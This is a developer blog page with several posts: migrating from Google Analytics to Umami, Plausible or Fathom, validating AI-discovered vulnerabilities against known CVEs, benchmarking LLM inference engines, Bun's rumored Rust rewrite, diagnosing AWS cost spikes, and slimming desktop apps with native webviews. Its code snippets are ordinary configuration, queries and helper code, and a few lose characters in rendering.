Alan West | Dev Blog on Auth, AI Tools and Code

Migrating Off Google Analytics: Umami vs Plausible vs Fathom

Alan West — Tue, 12 May 2026 03:18:44 GMT

The wake-up call I didn't ask for

Last week the TanStack folks reported what appears to be a compromise affecting some of their NPM packages (the details are still being sorted out in issue #7383 — read it yourself before drawing conclusions). I won't rehash the postmortem here. What I want to talk about is the gut-punch feeling I had reading it.

I run npm install every day. I've barely thought about which third-party scripts are loading in production. And one of the worst offenders sitting in nearly every site I've ever shipped? Analytics.

So this post is about something I've been chewing on for months but finally moved on: ripping Google Analytics out of three side projects and picking a privacy-focused alternative. Specifically, I'll compare Umami, Plausible, and Fathom — the three I actually evaluated — and walk through the migration steps that worked for me.

Why even migrate?

A few honest reasons, none of them ideological:

Script weight. GA4's gtag.js is heavy. The privacy-focused tools are typically 1–2 KB.
Cookie banners. No cookies = no consent banner in most jurisdictions. Fewer modals = fewer bounces.
Vendor trust. After watching a supply chain story unfold in real time, having fewer third-party scripts feels less reckless.
Self-hosting option. If I can run it on my own infra, I control the script.

If you genuinely need Google's audience features (remarketing, conversion linking to Google Ads), this post probably isn't for you. Stay where you are.

The contenders

Plausible

Open source (AGPL), GDPR/CCPA compliant, cloud or self-hosted. The script is small — the docs claim under 1 KB. Written in Elixir. Cloud plans are subscription-based.

Fathom

Privacy-focused, cloud-only since they pivoted from the original open source v1 ("Fathom Lite," archived) to a commercial closed-source product. I evaluated the commercial product.

Umami

Open source (MIT), self-hosted by default with a hosted cloud option on umami.is. Built on Next.js, runs on PostgreSQL or MySQL. Free if you host it yourself. Easy enough that I had it running in an evening.

Side-by-side

I'll keep this honest — I ran all three on the same site for two weeks before deciding.

Feature	Plausible	Fathom	Umami
Open source	Yes (AGPL)	No (closed)	Yes (MIT)
Self-host	Yes	No	Yes (primary path)
Cookies	No	No	No
GDPR	Yes	Yes	Yes
Cloud option	Paid	Paid	Free tier + paid
Script size	~1 KB	~2 KB	~2 KB
Funnels / goals	Yes	Yes	Yes (basic)

The sizes above match what I observed in the network tab, but check each vendor's docs before quoting them anywhere serious.

What the snippets look like

Replacing GA is mostly about swapping a script tag. Here's the before:


<script async src="https://www.googletagmanager.com/gtag/js?id=G-XXXXXX">script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-XXXXXX'); // sends pageview + sets cookies
script>

And the replacements:


<script defer data-domain="example.com"
        src="https://plausible.io/js/script.js">script>


<script src="https://cdn.usefathom.com/script.js"
        data-site="ABCDEFG" defer>script>


<script defer src="https://analytics.mydomain.com/script.js"
        data-website-id="your-website-id">script>

That's it. No dataLayer. No consent banner gate. The script loads once, sends a single beacon per pageview, and stops bothering you.

Custom events

The thing I almost forgot when migrating: GA's gtag('event', ...) calls. Here's how I rewrote them for Umami (the APIs are similar across the three, but each has its own conventions):

// Before (GA4)
gtag('event', 'signup_completed', {
  plan: 'pro',
  source: 'pricing_page'
});

// After (Umami)
// `umami` is attached to window by the loader script
window.umami?.track('signup_completed', {
  plan: 'pro',
  source: 'pricing_page'
});

Plausible uses window.plausible('signup_completed', { props: { plan: 'pro' } }). Fathom uses fathom.trackEvent('signup_completed'). Don't do a global find-and-replace — the property conventions differ enough that you'll want to read each vendor's docs first.

Self-hosting Umami in five minutes

This is the part that sold me. Here's the docker-compose.yml running on the VPS for one of my side projects:

services:
  umami:
    image: ghcr.io/umami-software/umami:postgresql-latest
    ports:
      - "3000:3000"
    environment:
      DATABASE_URL: postgresql://umami:umami@db:5432/umami
      DATABASE_TYPE: postgresql
      APP_SECRET: change-me-to-a-real-secret # rotate this
    depends_on:
      db:
        condition: service_healthy

  db:
    image: postgres:15-alpine
    environment:
      POSTGRES_DB: umami
      POSTGRES_USER: umami
      POSTGRES_PASSWORD: umami
    volumes:
      - umami-db:/var/lib/postgresql/data
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U umami"]

volumes:
  umami-db:

Run it behind Caddy or Nginx, point a subdomain at it, drop the script tag into your site. You own the data. Nothing leaves your server. The dashboard is genuinely pleasant — the Next.js UI loads fast and shows the things I actually look at.

Migration steps that worked

No magic, just mechanical:

Inventory your GA calls. Grep your codebase for gtag(, dataLayer, and any analytics wrapper functions. Write them down.
Pick your destination. Zero ongoing cost and own your data → self-hosted Umami. Don't want to run Postgres → Plausible Cloud. Want the most polished commercial dashboard → Fathom.
Run them in parallel for a week. Drop the new script alongside GA. Compare daily pageview counts. You'll see drift — the privacy-focused tools usually report fewer visits because they don't fingerprint, and that's kind of the point.
Rewrite custom events. Map each gtag('event', ...) to the new API. Wrap them in a helper so you can switch again later without grepping.
Remove the GA script and the cookie banner. This is the satisfying part.

My recommendation

Honestly? Here's how I'd choose:

Side projects, solo devs: Self-hosted Umami. Free, simple, MIT-licensed.
Small business, no ops appetite: Plausible Cloud. Easiest onboarding, still open source if you ever want to migrate off.
Polished dashboards for clients: Fathom. The UX feels the most "finished" of the three.

I'm not saying Google Analytics is bad — it's free, it's powerful, and it's still the right answer if you live inside their ad ecosystem. But for the rest of us, three lines of script and a Postgres container will get you 90% of what you actually look at, with one less third-party domain in your Content-Security-Policy.

The TanStack situation reminded me that every script tag is a trust decision. Make fewer trust decisions.

How to verify AI-discovered vulnerabilities aren't just training data echoes

Alan West — Tue, 12 May 2026 01:21:30 GMT

The setup

Last month a friend DM'd me a screenshot. An AI security agent had "discovered" a vulnerability in a popular open-source project. The agent walked through exploitation steps, suggested a patch, the whole nine yards. Looked legit.

Then someone pointed out the CVE ID it kept almost-quoting was from years earlier.

This is going to keep happening. As we wire LLMs into vulnerability research workflows, we run into a problem that doesn't have a clean analogue in traditional static analysis: the tool you're using may have already seen the answer in its training data, and it cannot reliably tell you which findings came from reasoning and which came from memory.

I've spent the last few months adding AI-assisted triage to a security workflow at a contracting gig. Here's what I've learned about not getting fooled.

Why this happens (the root cause)

LLMs train on whatever crawlable text is on the open internet. That includes:

The full NVD database
GitHub Security Advisories
CVE writeups on blogs
Bug bounty disclosures (after the embargo lifts)
Mailing list archives (oss-security, full-disclosure, etc.)
Project changelogs and commit messages

If a CVE was disclosed before a model's training cutoff, the model has very likely seen a description of the bug, the patch, and probably someone's analysis of it. When you point that same model at the vulnerable file, it isn't always finding the bug — sometimes it's recognizing it.

The tricky part: the model usually can't tell you which is which. It generates the same confident output either way. There's no internal flag for "I retrieved this from memory" versus "I derived this from the code in front of me."

This is the same phenomenon that makes LLMs unreliable for leaked benchmark questions — if the benchmark made it into training, the model "solves" it by recall. The security version just has higher stakes.

The validation workflow

Here's the rough process I run on any AI-flagged finding before it gets escalated. None of this is exotic — it's stuff I wish I'd been doing from day one.

Step 1: Check the public databases first

Before you trust any finding, fuzzy-match the bug fingerprint against known CVEs. The NVD publishes JSON data feeds you can pull locally:

import json
from difflib import SequenceMatcher
from pathlib import Path

# NVD yearly feeds: https://nvd.nist.gov/vuln/data-feeds
def load_nvd_feed(year: int) -> list[dict]:
    path = Path(f"nvdcve-1.1-{year}.json")
    return json.loads(path.read_text())["CVE_Items"]

def similarity(a: str, b: str) -> float:
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()

def find_matches(ai_description: str, package: str, threshold: float = 0.55):
    matches = []
    for year in range(2010, 2027):
        for item in load_nvd_feed(year):
            desc = item["cve"]["description"]["description_data"][0]["value"]
            # Cheap pre-filter: only compare CVEs that mention the package
            if package.lower() not in desc.lower():
                continue
            score = similarity(ai_description, desc)
            if score >= threshold:
                matches.append((score, item["cve"]["CVE_data_meta"]["ID"], desc))
    return sorted(matches, reverse=True)

hits = find_matches(ai_finding, package="openssl")
for score, cve_id, desc in hits[:5]:
    print(f"{score:.2f}  {cve_id}: {desc[:120]}...")

If you get a hit above ~0.6 similarity, your "discovery" is almost certainly a memorized CVE. SequenceMatcher is dumb but it catches the obvious cases. For better recall use sentence embeddings (the sentence-transformers library works fine) but start with the dumb thing — it's faster to debug.

Step 2: Check the timeline

Git history doesn't lie. If the model says "this buffer overflow in parse_packet," run blame on the offending lines and check what the file looked like at different points in time:

# When was the suspect line introduced?
git log --all --follow -p -- path/to/file.c | head -200

# Did a security fix already land near this code?
git log --all --source --remotes --grep="security\|CVE" \
    -- path/to/file.c

If a fix landed for this exact code path years ago and the model is "discovering" it against modern source, you've already got your answer. Either the bug is fixed (and the model is recalling the pre-fix version), or there's a regression — which is worth knowing either way, but it's not a novel discovery.

Step 3: Force the model to reason from scratch

Here's a trick that's saved me a lot of time. Run the analysis again with the package name and obvious identifiers redacted. Replace function names with hashes:

import re
import hashlib

def anonymize(source: str, package: str) -> str:
    # Strip package name and CVE-ish identifiers the model could pattern-match on
    source = re.sub(rf"\b{package}\b", "PACKAGE_X", source, flags=re.I)
    source = re.sub(r"CVE-\d{4}-\d+", "CVE-REDACTED", source)

    # Hash long identifiers so memorized function names don't trigger recall
    def hash_ident(m: re.Match) -> str:
        return "fn_" + hashlib.sha256(m.group(0).encode()).hexdigest()[:8]

    return re.sub(r"\b[a-z_][a-z0-9_]{6,}\b", hash_ident, source)

If the model still flags the same vulnerability class on the anonymized code, the finding is probably grounded in the code in front of it. If it suddenly can't find anything, you were getting recall.

This isn't bulletproof — distinctive code structure can still trigger memory — but it filters out a lot of noise. I haven't tested this thoroughly against every model family, so calibrate your threshold against findings you already know the answer to.

Prevention: building this into your workflow

A few habits that have stuck:

Treat AI findings as leads, not conclusions. Same as a static analyzer warning. You wouldn't ship a fix for a gosec G104 without reading the code; don't ship one for an LLM finding either.
Note the model's training cutoff in the report. Any CVE disclosed before that date is suspect by default.
Cross-check against multiple sources. NVD, GitHub Advisory DB, the project's own security page (for FreeBSD that's freebsd.org/security).
Require a working PoC before triaging as P1. If the model can't produce a reproducer that actually runs against the current code, the finding is theoretical at best.
Log the prompt and full output. When you eventually find out a "discovery" was a memory hit, you want to know what the prompt looked like so you can adjust.

The uncomfortable truth

Even when an AI tool does genuinely identify a real bug, you usually can't tell from the output alone whether it reasoned its way there or got lucky with memorization. That isn't a bug in any specific tool — it's a property of how these models work. The validation step isn't optional and it isn't going away.

The good news is that the validation is straightforward. The bad news is that I keep meeting teams who skip it because the AI sounded confident.

Don't skip it.

TokenSpeed and the Quiet Race to Make LLM Inference Boring

Alan West — Mon, 11 May 2026 16:56:57 GMT

Another inference engine?

So TokenSpeed is trending on GitHub this week, billing itself as a "speed-of-light LLM inference engine." I clicked through expecting either a vLLM clone or another Rust rewrite of llama.cpp. I haven't run it in production yet — the repo is fresh and I want to be honest about that up front — but the framing alone is worth talking about, because it points at a shift I've been watching for a while.

The last two years of inference work have been a sprint. PagedAttention landed in vLLM. Continuous batching went from research paper to default behavior. FlashAttention-2 and -3 showed up everywhere. We've gone from "can you even serve a 13B model" to "can you saturate your H100s." TokenSpeed is part of a wave that's stopped trying to invent new tricks and started trying to make the existing ones cheap, predictable, and operable.

That's a less exciting story than "we made inference 10x faster," but it's the one that actually matters if you're shipping.

What "speed of light" really means

The phrase gets tossed around loosely, so let me be precise. In inference, the speed-of-light bound for decoding is roughly:

tokens/sec ≤ memory_bandwidth / model_weights_size

For a 7B model in fp16 (~14GB of weights) on an H100 with ~3TB/s HBM bandwidth, the theoretical ceiling is around 200 tokens/sec for a single sequence. Real engines get somewhere between 30% and 80% of that depending on what tricks they pull. "Speed of light" inference means you're memory-bound, not compute-bound, and you're squeezing every last bit out of that bandwidth.

I'm not going to claim TokenSpeed actually hits this — I haven't benchmarked it, and I'd be skeptical of anyone who makes that claim without showing a reproducible harness. But the goal is the right goal. If you want to evaluate an inference engine, this is the math you should bring with you.

A practical benchmark you can actually run

When I'm comparing inference engines for a project, I don't trust marketing graphs. I run something boring like this against each candidate:

import time
import requests
import statistics

# Hit a local OpenAI-compatible endpoint exposed by your engine
ENDPOINT = "http://localhost:8000/v1/chat/completions"

def measure_ttft_and_tps(prompt, max_tokens=256):
    start = time.perf_counter()
    first_token_time = None
    token_count = 0

    # streaming so we can capture time-to-first-token accurately
    with requests.post(ENDPOINT, json={
        "model": "local",
        "messages": [{"role": "user", "content": prompt}],
        "max_tokens": max_tokens,
        "stream": True,
    }, stream=True) as r:
        for line in r.iter_lines():
            if not line or not line.startswith(b"data: "):
                continue
            if first_token_time is None:
                first_token_time = time.perf_counter()
            token_count += 1

    end = time.perf_counter()
    ttft = first_token_time - start
    # decode rate excludes prefill, which is the number that matters for UX
    tps = (token_count - 1) / (end - first_token_time)
    return ttft, tps

prompts = ["Explain quicksort."] * 20
results = [measure_ttft_and_tps(p) for p in prompts]
ttfts, tpss = zip(*results)

print(f"TTFT p50: {statistics.median(ttfts)*1000:.0f}ms")
print(f"TTFT p95: {sorted(ttfts)[int(len(ttfts)*0.95)]*1000:.0f}ms")
print(f"Decode tokens/sec p50: {statistics.median(tpss):.1f}")

Two numbers matter: time-to-first-token (TTFT) and steady-state decode rate. TTFT is dominated by prefill and request queueing — it's what your user feels when they hit submit. Decode rate is what determines whether your bill is sustainable.

I ran into a situation last year where an engine looked great on average throughput but had a TTFT p95 that was 4x worse than a "slower" alternative. Under load, the second engine felt faster to users even though it generated fewer tokens per second per request. Aggregate throughput is the wrong metric if you only ever look at the mean.

Where TokenSpeed fits (tentatively)

Looking at the repo, TokenSpeed appears to be aiming at the same niche as vLLM, TGI, SGLang, and TensorRT-LLM — high-throughput batched serving with an OpenAI-compatible API surface. According to the README it leans on the standard playbook: paged KV cache, continuous batching, and some form of speculative decoding. I want to stress that I'm describing what the changelog mentions, not what I've personally verified.

My honest take on this category:

vLLM is the default. Big community, fast-moving, supports almost every model that matters. It's what I reach for unless I have a specific reason not to.
TGI is fine if you're already in the Hugging Face ecosystem.
SGLang is genuinely interesting for structured generation and complex prompting patterns.
TensorRT-LLM wins on raw H100/H200 throughput if you can stomach the build complexity.
llama.cpp is still the right answer for CPU, Apple Silicon, and edge deployments.

A new entrant has to do something specific better, or it's just another README. I'll be watching to see what TokenSpeed's specific edge actually is once people run real benchmarks. The trending chart isn't a benchmark.

The operational stuff nobody talks about

The thing I've learned the hard way: inference engine choice matters less than how you operate the thing. A few patterns that have saved me real money:

Pin your model versions in the deployment manifest, not in code. Roll forward via deployment, not via app release.
Separate prefill-heavy and decode-heavy traffic onto different replicas if you can. Long-context summarization and chat have very different shapes; mixing them in one pool hurts both.
Cap max_tokens aggressively at the gateway. A single runaway request can starve a whole replica's KV cache budget.

For observability, you want request-level metrics (TTFT, decode TPS, queue depth, cache utilization) flowing somewhere you can actually query. I usually pipe inference metrics to Prometheus and frontend analytics through something privacy-respecting. Privacy-focused options like Umami or Plausible give you full data ownership without dragging your users through GDPR consent gymnastics, which matters a lot for the LLM tools I've shipped to European clients.

Should you switch?

Probably not yet. If you're already running vLLM in production and it's meeting your SLOs, the cost of swapping is real: new failure modes, new tuning knobs, new metrics dashboards. The cost of staying is just continuing to pay attention.

What I'd actually do with TokenSpeed today:

Clone it on a dev box.
Run the benchmark above against your real workload mix (not the README's prompt set).
Compare numbers honestly, including p95 and p99, not just the mean.
If it's meaningfully better — say, >20% on the metric that's actually your bottleneck — file a ticket to revisit in three months when the project has had a chance to settle.

Fresh inference engines are exciting, but "fresh" and "production-ready" are different things. The honest move is to bookmark this, check back when 0.x becomes 1.x, and let the early adopters find the segfaults.

The official repo is at github.com/lightseekorg/tokenspeed if you want to follow along. For context on the broader category, the vLLM docs and the original PagedAttention paper are still the best place to build intuition for why any of this works at all.

Bun, Zig, and Rust: What the Rewrite Rumor Means for Your Stack

Alan West — Mon, 11 May 2026 15:11:00 GMT

A surprising headline (with caveats)

Last week a tweet from Jarred Sumner — Bun's creator — made the rounds claiming a Zig-to-Rust rewrite is passing 99.8% of the testsuite. I haven't been able to independently verify this through Bun's official release notes or the changelog at bun.sh, so take the specifics with a grain of salt. According to early reports it's a real effort, but I'd treat the exact percentage as anecdotal until something hits the official channels.

The conversation it kicked up on Reddit and HN is still worth digging into. It surfaces a question I've been chewing on for years: when does it actually make sense to rewrite a working systems project in a different language? I've migrated three production services between languages over the last few years (Go to Rust twice, Node to Bun once), so let me walk through what a Bun rewrite would mean — and use it as a lens for the broader Zig vs Rust comparison.

Why anyone rewrites in the first place

Rewrites are almost always a bad idea. Joel Spolsky wrote about this 25 years ago and it hasn't aged a day. The reasons people do them anyway tend to fall into three buckets:

Hiring: the original language has a shallow talent pool
Tooling: the ecosystem doesn't give you what you need (debuggers, profilers, libraries)
Compiler guarantees: you're hitting bugs the type system could've caught

For Bun, the rumored rationale leans on the third one. Zig is phenomenally productive for this kind of work — I've used it for a small parser project and the comptime story is genuinely magical — but its lack of borrow-checker-style memory safety guarantees makes a multi-megabyte runtime a scary place to live long-term.

Zig vs Rust: a side-by-side

Let me show what idiomatic equivalents look like. Here's a tiny string-handling snippet in Zig:

const std = @import("std");

pub fn greet(allocator: std.mem.Allocator, name: []const u8) ![]u8 {
    // Explicit allocator, explicit error union via the leading !
    return std.fmt.allocPrint(allocator, "Hello, {s}!", .{name});
}

And the Rust equivalent:

// Allocation goes through the standard library's String
// Ownership is checked at compile time, no manual allocator needed here
pub fn greet(name: &str) -> String {
    format!("Hello, {name}!")
}

The Rust version is shorter, but that's not the real story. The real story is what the compilers will and won't catch for you:

Zig: explicit allocators, explicit error sets, no hidden control flow. You get speed and clarity. You don't get memory-safety guarantees.
Rust: the borrow checker enforces aliasing and lifetime rules at compile time. Slower to write, harder to learn, but use-after-free and data races become much harder to ship.

For a JavaScript runtime that ingests untrusted code, that distinction matters a lot.

The migration math

If Bun's team really pulled this off, the scale is staggering. We're talking on the order of hundreds of thousands of lines of Zig translated — bundler, package manager, transpiler, the JavaScriptCore glue, the test runner. "99.8% of the testsuite passing" sounds great until you realize 0.2% of a six-digit testsuite is still a lot of broken edge cases.

I went through a much smaller version of this when I moved a Go service to Rust last year. Things I underestimated:

Test ports that look fine but quietly assume different concurrency primitives
Allocator behavior changes that only surface under sustained load
FFI boundaries — Bun in particular has a giant surface to JavaScriptCore

If you're considering a similar rewrite at your company, the rule I've learned the hard way: budget 3-5x your initial estimate, then add another 50%.

Migration steps, if you were doing this yourself

Let's say you have a smaller Zig project and you're tempted to follow Bun's lead. Here's the rough order I'd go in:

Pick a leaf module first. Something with no dependents, ideally pure logic. Translate it, write a parity test against the Zig version, and run them side by side.
Use a thin C ABI bridge. Both Zig and Rust have first-class extern "C". Translate one module at a time and call across the boundary while you migrate.
Move the allocator strategy explicitly. Rust's default global allocator behaves differently from a Zig arena. Decide upfront whether you're using bumpalo, a custom allocator, or just Box/Vec everywhere.
Port tests last, then again. Run the original Zig tests through the Rust API, then write Rust-native ones. The two suites catch different bugs.

What about the rest of us?

For most of us writing application code, this debate is academic. You probably won't notice if Bun underneath is Zig or Rust — you care about install times, hot reload, and whether bun test survives your monorepo (it does, mostly).

Where it does matter is ecosystem implications:

Plugin authors might have to adapt if internal APIs shift
Native module authors could get a friendlier extension story under Rust's tooling
Build times for contributing to Bun itself would shift, in either direction

A side note on monitoring your Bun apps

While we're on tooling: if you're running a Bun app in production and want to track usage without dragging in a heavyweight analytics SaaS, the privacy-focused options are worth a look. I've used Plausible, Fathom, and most recently Umami on personal projects.

Quick rundown:

Plausible: hosted or self-hosted, GDPR-compliant by default, simple dashboard. Pricing on the hosted plan is page-view based.
Fathom: hosted only, also privacy-focused, slightly nicer UI in my opinion. No self-host option.
Umami: open source, self-hostable on a basic Postgres or MySQL stack, no cookies, GDPR-compliant out of the box. Free if you run it yourself.

I currently host Umami on a small Hetzner box for my dev blog. The integration is one tag:

<script
  defer
  src="https://your-umami-instance.com/script.js"
  data-website-id="your-id-here"
>script>

That's it. No cookie banner required, no per-visit charges, and it pairs nicely with a Bun- or Node-based site because it doesn't care what runtime serves the page.

If you're doing auth on the same project, Authon is what I'm using on a side project right now — it's a hosted service (self-hosting is on the roadmap but not available yet), the free plan has unlimited users with no per-user pricing, and they support 10+ OAuth providers. I won't go deeper than that here, just noting it as another piece of the indie-dev stack that fits this same "small server, no surprises" vibe.

My take

If the rewrite report is accurate, I'd guess we're 12-18 months out from a stable, public Rust-based Bun. Until I see something on the official changelog, though, I'm treating it as a strong rumor rather than a roadmap commitment.

What I would actually do today:

If you're already on Bun, keep using it. Nothing changes for application authors.
If you're starting a new systems project, Rust still has a more mature crate ecosystem and a larger talent pool. Zig is more fun to write but the safety story matters at scale.
If you're picking a low-level language to learn for 2026, learn Rust first, then dabble in Zig once you understand low-level memory work — they reinforce each other better in that order.

Rewrites are romantic. Most should not happen. The interesting ones — the ones we actually learn from — are the ones where the team already shipped something great in the first language and is rewriting because they hit a ceiling, not because they got bored. That's the bar I'd hold any "rewrite the runtime" rumor to.

Why your AWS bill exploded overnight and how to actually fix it

Alan West — Mon, 11 May 2026 15:02:49 GMT

The 3 AM Slack message every developer dreads

Last month I got pinged at 3 AM because our cloud bill had tripled in 24 hours. No new deployments. No traffic spike. Just a number that climbed while everyone slept.

If you've spent any time on a major cloud platform, you've probably been here. The dashboard shows green, the app runs fine, but somewhere a service is quietly burning money. After debugging this on three different projects in the last year, I've found the patterns are almost always the same.

Let me walk you through how I track these down and what I do to prevent them.

The root cause is almost never what you think

Here's the frustrating truth: surprise cloud bills are rarely from the obvious culprits. It's not your main compute instances. It's not your database. Those costs are predictable.

The real killers are usually one of these:

NAT gateway data transfer — every byte through a NAT costs money, and chatty services rack this up fast
Cross-AZ traffic — services in different availability zones talking to each other constantly
Unused load balancers and elastic IPs — they keep billing even when nothing uses them
Log ingestion — debug logging left on in production, multiplied by millions of requests
Snapshot retention — old EBS snapshots accumulating for years

The pattern I see most often? A misconfigured service inside a private subnet pulling gigabytes through a NAT gateway because someone forgot to set up a VPC endpoint.

Step 1: Find what changed

Before touching anything, figure out what's different. I always start with billing data grouped by service and usage type.

If you're using the AWS CLI, the Cost Explorer API is your friend:

aws ce get-cost-and-usage \ --time-period Start=2026-05-01,End=2026-05-11 \ --granularity DAILY \ --metrics UnblendedCost \ --group-by Type=DIMENSION,Key=USAGE_TYPE

The USAGE_TYPE grouping is the key. SERVICE will tell you EC2 is expensive — well, no kidding. But USAGE_TYPE will tell you it's specifically DataTransfer-Regional-Bytes or NatGateway-Bytes, which actually points you somewhere.

Once you know the usage type, you can dig deeper. For NAT gateway issues, VPC Flow Logs will show you exactly which instances are responsible.

Step 2: Trace the traffic

This is where most people get stuck. You know NAT traffic is high, but which service is causing it?

Enable VPC Flow Logs to CloudWatch or S3, then query them. Here's an Athena query I've used a dozen times:

SELECT srcaddr, dstaddr, SUM(bytes) AS total_bytes FROM vpc_flow_logs WHERE day BETWEEN '2026/05/01' AND '2026/05/10' -- Filter to traffic going through the NAT AND action = 'ACCEPT' AND dstport IN (443, 80) GROUP BY srcaddr, dstaddr ORDER BY total_bytes DESC LIMIT 50;

The top results almost always tell the story. Last week this query showed me one ECS task pulling 400GB from S3 through the NAT gateway every day. Through the NAT. To get to S3. In the same region.

That's the kind of thing that hides for months until someone audits it.

Step 3: Fix the actual problem

For the S3-via-NAT issue, the fix is a gateway VPC endpoint. It's free, takes about two minutes to create, and stops the bleeding immediately:

Terraform example for a gateway endpoint

resource "aws_vpc_endpoint" "s3" { vpc_id = aws_vpc.main.id service_name = "com.amazonaws.us-east-1.s3"

Attach to your private route tables so traffic to S3

bypasses the NAT gateway entirely

route_table_ids = [ aws_route_table.private_a.id, aws_route_table.private_b.id, ]

vpc_endpoint_type = "Gateway" }

For cross-AZ chatter, you have a few options depending on the workload:

Use topology-aware service discovery so clients prefer same-AZ targets
For Kafka or similar, configure rack awareness
For databases, run read replicas in each AZ and route reads locally

For log ingestion costs, audit your log levels. I once found a service logging the entire request body at INFO level. After dropping it to DEBUG and sampling 1% of requests, our log bill dropped 80%.

Step 4: Set up guardrails so it doesn't happen again

The fix is only half the job. Without monitoring, you'll be back here in six months for a different reason.

I set up budget alerts at multiple thresholds, but more importantly, I set up anomaly detection on usage types. A 50% increase in NAT gateway bytes overnight is the kind of signal you want a page for, not a monthly summary.

Here's a CloudWatch alarm pattern I use:

Pseudo-code for the alarm logic

if current_hour_nat_bytes > (baseline_avg * 2):

Page on-call, not just email

The bill is already being generated

trigger_pagerduty_alert()

I also run a weekly cron job that lists every load balancer, elastic IP, and EBS volume in the account, cross-references against what's actually in use, and posts a report to Slack. It takes about 50 lines of Python and has caught at least four forgotten resources in the last year.

Prevention tips that actually work

A few things I've learned the expensive way:

Tag everything at creation time. If you can't answer "who owns this resource?" in 10 seconds, you can't manage costs. I enforce this with SCPs that block resource creation without specific tags.
Treat NAT gateways as expensive by default. Any service that talks to AWS APIs should go through a VPC endpoint. S3, DynamoDB, SQS, Secrets Manager — all of them have endpoints.
Set log retention explicitly. The default "never expire" is a silent budget killer. 30 days is fine for most things; if you need longer, archive to S3 with lifecycle rules to Glacier.
Review your reserved capacity quarterly. Workloads shift. Reservations you bought 18 months ago might not match current usage at all.
Run a cost game day. Once a quarter, pretend the bill doubled and trace where it could have come from. You'll find problems before they become real.

The bigger lesson

Cloud costs aren't really an infrastructure problem — they're an observability problem. You can't fix what you can't see, and most teams aren't watching the right signals.

The services that cost you money quietly are the ones designed to scale invisibly. That's a feature most of the time. But when it breaks, it breaks expensively. Build the visibility before you need it, and these 3 AM pages get a lot less common.

Why cross-platform desktop apps balloon to 200MB and how to slim them down

Alan West — Mon, 11 May 2026 14:03:39 GMT

The 200MB "Hello World"

I shipped my first cross-platform desktop app back in 2018. Markdown editor. Three buttons, a text area, syntax highlighting. The final installer was 187MB.

Every time I open Activity Monitor during dev work, I see a handful of Electron-based apps each parked at 300MB. That's well over a gigabyte of RAM for tools I'm not even actively using. A chat client, a code editor, a git GUI, a note-taker. The math finally caught up with me last month, and I started digging into what it would actually take to ship a desktop app that doesn't melt your laptop.

This post is about the root cause of that bloat and the path I've been walking to fix it. There's no magic, just a different architectural choice that systems languages like Zig and Rust have made cheap to take.

Root cause: every app ships its own browser

The popular bundler-based desktop frameworks all follow the same recipe: ship Chromium plus a Node.js runtime alongside your app, then load your HTML/CSS/JS inside it.

The catch is that "bundle Chromium" means a full Chromium. Not a stripped rendering engine. The whole browser, including:

V8 JavaScript engine
Blink rendering engine
A separate Node.js runtime alongside the renderer
Media codecs, sandboxing layers, GPU process, the lot

Five of those apps running = five copies of Chromium in memory. None of them share processes. None of them benefit when your OS gets a faster, more secure browser shipped by the vendor.

And it's not just RAM. Disk space, code-signing time, auto-update bandwidth, startup latency — they all scale with the runtime. You're paying for a browser you don't use.

The native webview approach

Every modern OS already exposes a system webview component:

Windows: WebView2, built on Edge (docs)
macOS / iOS: WKWebView, built on WebKit (docs)
Linux: WebKitGTK (docs)
Android: the platform WebView

These components are already loaded for other apps. Use them and your app doesn't ship a browser at all — it borrows one.

The trade-off: there's no unified API across platforms. You need a thin native shell that creates a window, embeds the OS webview into it, wires up message passing between native and JS, and exposes whatever OS APIs your app needs.

This is the part where systems languages with clean C interop become useful. The shell stays tiny because you're not implementing a browser — you're calling four or five C functions per platform. Zig fits this particularly well because its @cImport lets you pull in system headers directly without a binding-generation step.

Step 1: spawn a window with a webview

Here's the rough shape of the macOS shell in Zig. I'm using @cImport to grab the Objective-C runtime and message it directly. WebKit's classes are reachable the same way:

const std = @import("std");
const objc = @cImport({
    @cInclude("objc/objc.h");
    @cInclude("objc/message.h");
});

// Helper that wraps objc_msgSend with the right calling convention.
// objc_msgSend is variadic in C but we need typed Zig wrappers per signature.
fn cls(name: [:0]const u8) ?*anyopaque {
    return objc.objc_getClass(name.ptr);
}

fn sel(name: [:0]const u8) objc.SEL {
    return objc.sel_registerName(name.ptr);
}

pub fn run(url: [:0]const u8) !void {
    const NSApplication = cls("NSApplication").?;
    const app = msgSend(NSApplication, sel("sharedApplication"));

    // ... allocate NSWindow, attach WKWebView, navigate to url ...

    _ = msgSend(app, sel("run")); // Blocking event loop
}

I left the WKWebView setup out because the post would balloon, but the pattern is mechanical. The full shell for one platform fits in a few hundred lines.

Step 2: IPC between native and JS

The webview exposes a message channel in both directions. On WKWebView, JS calls window.webkit.messageHandlers..postMessage(...) and your native code receives a callback. On WebView2 it's window.chrome.webview.postMessage(...). The shell normalizes these so the page sees one API.

Here's a small request/response wrapper I use on the JS side. Each call gets a UUID so replies can be routed back to the right promise:

// Injected once at page load by the native shell
window.__pending = new Map();

function callNative(method, params) {
  const id = crypto.randomUUID();
  return new Promise((resolve, reject) => {
    window.__pending.set(id, { resolve, reject });
    // bridge is the platform-specific postMessage hook
    window.bridge.postMessage(JSON.stringify({ id, method, params }));
  });
}

// Native side calls this back with { id, ok, value } once the work is done
window.__resolveNative = ({ id, ok, value }) => {
  const pending = window.__pending.get(id);
  if (!pending) return;
  window.__pending.delete(id);
  ok ? pending.resolve(value) : pending.reject(new Error(value));
};

Step 3: put types on top

Raw string messages get painful fast. A small typed RPC layer on the TS side keeps things sane:

// Single source of truth for the bridge surface
interface NativeAPI {
  'fs.readDir':  (p: { path: string }) => Promise<string[]>;
  'fs.readFile': (p: { path: string }) => Promise<string>;
  'window.minimize': () => Promise<void>;
}

// Generic helper that preserves param + return types per method name
function rpc<K extends keyof NativeAPI>(
  method: K,
  params: Parameters[0],
): ReturnType<NativeAPI[K]> {
  return callNative(method, params) as ReturnType;
}

const files = await rpc('fs.readDir', { path: '~/Documents' });

Mirror that interface in the native dispatcher and the compiler catches typos on both sides.

What you actually save

In a side-by-side I ran with a small clipboard manager last month:

Chromium-bundled version: ~142MB installed, ~180MB RAM at idle
Native-webview version: ~6MB installed, ~35MB RAM at idle

The 35MB is mostly the webview process the OS is already running. Subsequent webview-based apps add roughly 10–15MB each because they share the system component.

Prevention tips

If you're starting a new desktop or hybrid mobile app, here's what I'd weigh:

